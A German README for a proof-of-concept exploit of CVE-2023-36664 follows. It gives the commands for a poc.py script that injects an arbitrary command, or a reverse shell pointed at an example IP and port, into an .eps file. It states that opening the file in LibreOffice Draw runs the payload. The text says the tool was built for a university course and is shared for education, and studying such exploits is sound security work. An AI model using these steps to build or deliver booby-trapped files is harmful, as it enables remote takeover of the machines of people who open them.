
Proof-of-Concept entwickelt für die CVE-2023-36664
Proof-of-Concept für CVE-2023-36664.
Um eine Nutzlast in eine .eps-Datei einzufügen:
python3 poc.py -f "filename" --payload "command"
#python3 poc.py -f file.eps --payload firefox
Um eine Reverse-Shell-Nutzlast in eine .eps-Datei einzufügen:
python3 poc.py -f "filename" --revshell --ip "ip" --port "port"
#python3 poc.py -f file.eps --revshell --ip 192.168.122.1 --port 1234
Das Öffnen der injizierten Datei in Libreoffice Draw sollte die Nutzlast auslösen.
Dieser Proof-of-Concept wurde für einen bestimmten Kurs an der Universität entwickelt. Er wird hier nur zu pädagogischen Zwecken veröffentlicht.